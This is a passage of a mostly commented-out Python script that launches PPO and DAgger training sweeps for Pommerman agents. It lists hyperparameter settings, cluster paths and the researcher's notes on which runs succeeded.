# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# ### These are like the above but additionally distill from DaggerAgent
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "initexuvl", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000, "use-gae": "",
# "distill-expert": "DaggerAgent", "distill-epochs": 10000,
# "distill-target": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt",
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000, "use-gae": "",
# "distill-expert": "DaggerAgent", "distill-epochs": 10000,
# "distill-target": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt",
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "DaggerAgent", "distill-epochs": 10000,
# "distill-target": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt",
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "DaggerAgent", "distill-epochs": 10000,
# "distill-target": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt",
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
### These are trying to do homogenous training on EasyEnv but distilling from SimpleAgent
# These didn't work. They all went to random.
# train_ppo_job({ # Batch size of 400
# "num-processes": 8, "run-name": "homoeasy", "how-train": "homogenous",
# "log-interval": 150, "lr": 0.0003, "num-steps": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "distill-epochs": 10000, "distill-expert": "SimpleAgent",
# "config": "PommeTeamEasy-v0", "eval-mode": "homogenous", "gamma": ".995",
# "num-battles-eval": 50, "num-mini-batch": 2, "model-str": "PommeCNNPolicySmaller",
# "half-lr-epochs": 5000, "use-gae": ""
# }, "pmanhomo")
# train_ppo_job({ # Batch size of 600
# "num-processes": 8, "run-name": "homoeasy", "how-train": "homogenous",
# "log-interval": 150, "lr": 0.0003, "num-steps": 150,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "distill-epochs": 10000, "distill-expert": "SimpleAgent",
# "config": "PommeTeamEasy-v0", "eval-mode": "homogenous", "gamma": ".995",
# "num-battles-eval": 50, "num-mini-batch": 2, "model-str": "PommeCNNPolicySmaller",
# "half-lr-epochs": 5000, "use-gae": ""
# }, "pmanhomo")
# train_ppo_job({ # Batch size of 400
# "num-processes": 8, "run-name": "homoeasy", "how-train": "homogenous",
# "log-interval": 150, "lr": 0.0003, "num-steps": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "distill-epochs": 10000, "distill-expert": "SimpleAgent",
# "config": "PommeTeamEasy-v0", "eval-mode": "homogenous", "gamma": ".995",
# "num-battles-eval": 50, "num-mini-batch": 2, "model-str": "PommeCNNPolicySmall",
# "half-lr-epochs": 5000, "use-gae": ""
# }, "pmanhomo")
# train_ppo_job({ # Batch size of 600
# "num-processes": 8, "run-name": "homoeasy", "how-train": "homogenous",
# "log-interval": 150, "lr": 0.0003, "num-steps": 150,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "distill-epochs": 10000, "distill-expert": "SimpleAgent",
# "config": "PommeTeamEasy-v0", "eval-mode": "homogenous", "gamma": ".995",
# "num-battles-eval": 50, "num-mini-batch": 2, "model-str": "PommeCNNPolicySmall",
# "half-lr-epochs": 5000, "use-gae": ""
# }, "pmanhomo")
### Dagger agents on the easy env.
# These had good results in the tensorboard but were terrible when I ran eval.
# For example:
# CUDA_VISIBLE_DEVICES=0 python eval.py --eval-targets
# ppo::/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-easydag.dagger.PommeTeamEasy-v0.PommeCNNPolicySmall.nc256.lr0.003.mb275.ne20.prob0.5.nopt1.epoch1050.steps840800.seed1.pt
# --eval-opponents simple::null,simple::null --num-battles-eval 100 --config PommeTeamEasy-v0
# --cuda-device 0 --eval-mode team-simple --model-str PommeCNNPolicySmall
# had a 37% success rate in the TB but yielded 25 / 25 / 60 for w/l/t.
# CUDA_VISIBLE_DEVICES=0 python eval.py --eval-targets
# ppo::/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-easyexuvl.dagger.PommeTeamEasy-v0.PommeCNNPolicySmaller.nc256.lr0.003.mb275.ne20.prob0.5.nopt1.epoch900.steps720800.seed1.pt
# --eval-opponents simple::null,simple::null --num-battles-eval 100 --config PommeTeamEasy-v0
# --cuda-device 0 --eval-mode team-simple --model-str PommeCNNPolicySmaller
# had a 37% success rate in the TB but yielded 24 / 25 / 61.
# train_dagger_job(
# {"num-processes": 8, "run-name": "easyexuvl", "how-train": "dagger", "num-episodes-dagger": 20,
# "log-interval": 50, "minibatch-size": 275, "save-interval": 50, "lr": 0.003, "num-steps-eval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamEasy-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# }, "easyexuvl"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "easydag", "how-train": "dagger", "num-episodes-dagger": 20, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.003, "num-steps-eval": 100, "use-value-loss": "",
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamEasy-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# }, "easydag"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "easyexuvl", "how-train": "dagger", "num-episodes-dagger": 20,
# "log-interval": 50, "minibatch-size": 275, "save-interval": 50, "lr": 0.003, "num-steps-eval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamEasy-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmall",
# }, "easyexuvl"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "easydag", "how-train": "dagger", "num-episodes-dagger": 20, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.003, "num-steps-eval": 100, "use-value-loss": "",
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamEasy-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmall",
# }, "easydag"
# )
### FB Cluster Runs: These distill simple agent into PPO on the 1000 FFA dataset. Can we overfit?
# It appears that at least two of these did pretty darn well. The signatures for those:
# Both use gae, both use .99, and both have an LR of less than 1e-3
#
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".99",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .0001,
# "use-gae": "", "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".99",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .0001,
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".99",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .001,
# "use-gae": "", "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".99",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .001,
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".99",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .0003,
# "use-gae": "", "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".99",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .0003,
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".95",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .0001,
# "use-gae": "", "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".95",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .0001,
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".95",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .001,
# "use-gae": "", "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".95",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .001,
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".95",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .0003,
# "use-gae": "", "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
# train_ppo_job({
# "num-processes": 25, "run-name": "dstuni21", "how-train": "simple",
# "log-interval": 1000, "num-steps": 200,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "distill-epochs": 5000, "distill-expert": "SimpleAgent",
# "config": "PommeFFAEasy-v0", "gamma": ".95",
# "num-battles-eval": 100, "model-str": "PommeCNNPolicySmall", "lr": .0003,
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21"
# }, "pmanuni21", is_fb=True)
### This is a follow up to the experiments above
# It's a cartesian product of:
# {5000 distill, 2000 distill, no distill}, {LR of 7e-4, 3e-4}, and gamma of {.99, .995}
# except that the 5000-distill setting skips the {5000, 3e-4, .99} combination because it's
# already accounted for in the runs above.
# job = {
# "num-processes": 25, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21", "use-gae": ""
# }
# counter = 0
# for learning_rate in [7e-4, 3e-4]:
# for gamma in [.99, .995]:
# for distill in [0, 2000, 5000]:
# if distill == 5000 and gamma == .99 and learning_rate == 3e-4:
# continue
# if distill:
# run_name = "pmansmpdst"
# job["distill-epochs"] = distill
# job["distill-expert"] = "SimpleAgent"
# else:
# run_name = "pmansmp"
# job["run-name"] = run_name + "-%d" % counter
# job["gamma"] = gamma
# job["lr"] = learning_rate
# train_ppo_job(job, "pmansmp-%d" % counter, is_fb=True)
# counter += 1
### These are the distill 0s from above. I fucked up and ran them incorrectly, so redoing here.
# job = {
# "num-processes": 40, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform21", "use-gae": ""
# }
# counter = 0
# for learning_rate in [7e-4, 3e-4]:
# for gamma in [.99, .995]:
# for distill in [0]:
# run_name = "pmansmp"
# j = {k:v for k,v in job.items()}
# j["run-name"] = run_name + "-%d" % counter
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, "pmansmp-%d" % counter, is_fb=True)
# counter += 1
### This is a further follow up to the experiments above using a bigger number of games (10000)
# It's a cartesian product of {5000 distill, 2000 distill, no distill}, {LR of 7e-4, 3e-4, 1e-4}, and gamma of {.99, .995}
# job = {
# "num-processes": 25, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "state-directory": os.path.join(directory, "ffaeasy-10k-s100"),
# "state-directory-distribution": "uniform21", "use-gae": ""
# }
# counter = 0
# for learning_rate in [7e-4, 3e-4, 1e-4]:
# for gamma in [.99, .995]:
# for distill in [0, 2000, 5000]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman10k-%d" % counter
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### This is a follow up to the experiments two above using a longer uniform of 33.
# It's a cartesian product of {5000 distill, 2000 distill, no distill}, {LR of 7e-4, 3e-4, 1e-4}, and gamma of {.99, .995}
# job = {
# "num-processes": 25, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "state-directory": os.path.join(directory, "ffaeasyv0-seed1"),
# "state-directory-distribution": "uniform33", "use-gae": ""
# }
# counter = 0
# for learning_rate in [7e-4, 3e-4, 1e-4]:
# for gamma in [.99, .995]:
# for distill in [0, 2000, 5000]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman1k33-%d" % counter
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are testing out the 8x8 agent to see if maybe PPO can work on that,
# possibly with a classification loss. These worked Really well!!!
# job = {
# "num-processes": 25, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFA8x8-v0", "board-size": 8,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# # "eval-mode": "ffa-curriculum"
# }
# counter = 0
# for learning_rate in [3e-4, 1e-4]:
# for gamma in [.99, .995]:
# for distill in [0, 2500]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman8x8-%d" % counter
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### More uniform experiments, this time uniform66 and uniformAdapt with 10k.
# 66 killed it! uniformAdapt I fucked up and am rerunning (see below)
# Cartesian product of {3000 distill, no distill}, {LR of 1e-4, 3e-5} and gamma of {.99, .995}
# job = {
# "num-processes": 25, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffaeasy-10k-s100"),
# }
# counter = 0
# for learning_rate in [1e-4, 3e-5]:
# for gamma in [.99, .995]:
# for distill in [0, 3000]:
# for (name, distro) in [("u66", "uniform66")]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman%s-%d" % (name, counter)
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are anneal bomb reward models.
# These didn't work very well. They worked slightly better than the original, but still not
# well enough.
# Cartesian product of {3000 distill, no distill}, {LR of 1e-4, 3e-5} and gamma of {.99, .995}
# job = {
# "num-processes": 25, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# }
# counter = 0
# for learning_rate in [3e-4, 1e-4, 3e-5]:
# for gamma in [.99, .995]:
# for distill in [0, 3000]:
# for anneal_bomb_penalty_epochs in [100, 1000, 5000]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pmanABPE-%d" % counter
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# j["anneal-bomb-penalty-epochs"] = anneal_bomb_penalty_epochs
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### More uniform experiments, this time uniformAdapt and uniformScheduleA with 10k.
# Cartesian product of {3000 distill, no distill}, {LR of 1e-4, 6e-5} and gamma of {.99, .995}
# NOTE: The uniformAdapt on these use running_success_max_len=40. That's a lot (800 epochs).
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffaeasy-10k-s100"),
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.99, .995]:
# for distill in [0, 3000]:
# for (name, distro) in [("uSchA", "uniformScheduleA"), ("uAdpt", "uniformAdapt")]:
# for num_processes in [25, 50]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman%s-%d" % (name, counter)
# j["num-processes"] = num_processes
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are the uniformAdapt as above but with ~200 epochs running_success_max_len=10, so roughly 4x faster. Also only running one gamma and no distill because that seems to be ok.
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffaeasy-10k-s100"),
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.99]:
# for distill in [0]:
# for (name, distro) in [("uAdpt10", "uniformAdapt")]:
# for num_processes in [25, 50]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman%s-%d" % (name, counter)
# j["num-processes"] = num_processes
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### This is a uniform66 test to see if we can run higher processor numbers (corresponding lower numsteps)
# It worked and is arguably better because it's faster.
# job = {
# "num-processes": 50, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffaeasy-10k-s100"),
# }
# counter = 0
# for learning_rate in [1e-4]:
# for gamma in [.99, .995]:
# for distill in [0, 3000]:
# for (name, distro) in [("u66", "uniform66")]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman%s-%d-hnp" % (name, counter)
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffaeasy-10k-s100"),
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.99, .995]:
# for distill in [0]:
# for (name, distro) in [("uBndsA", "uniformBoundsA"), ("uBndsB", "uniformBoundsB")]:
# for num_processes in [25, 50]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman%s-%d" % (name, counter)
# j["num-processes"] = num_processes
# j["state-directory-distribution"] = distro
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# These are testing out the 8x8 agent to see if maybe PPO can work on that,
# possibly with a classification loss. These are on the no-skull setup though.
# job = {
# "num-processes": 25, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFA8x8-v0", "board-size": 8,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# # "eval-mode": "ffa-curriculum"
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.99, .995]:
# for distill in [0, 3000]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman8x8nsk-%d" % counter
# if distill:
# j["run-name"] += "-dst"
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are homogenous jobs on 8x8.
# job = {
# "num-processes": 30, "how-train": "homogenous", "eval-mode": "homogenous",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeTeam8x8-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "use-gae": "", "board-size": 8,
# }
# counter = 0
# for learning_rate in [3e-4, 1e-4, 6e-5]:
# for gamma in [.99, .995]:
# j = {k:v for k,v in job.items()}
# run_name = "pmanhom8x8"
# j["run-name"] = run_name + "-%d" % counter
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Homog similar to above but using distill as well.
# job = {
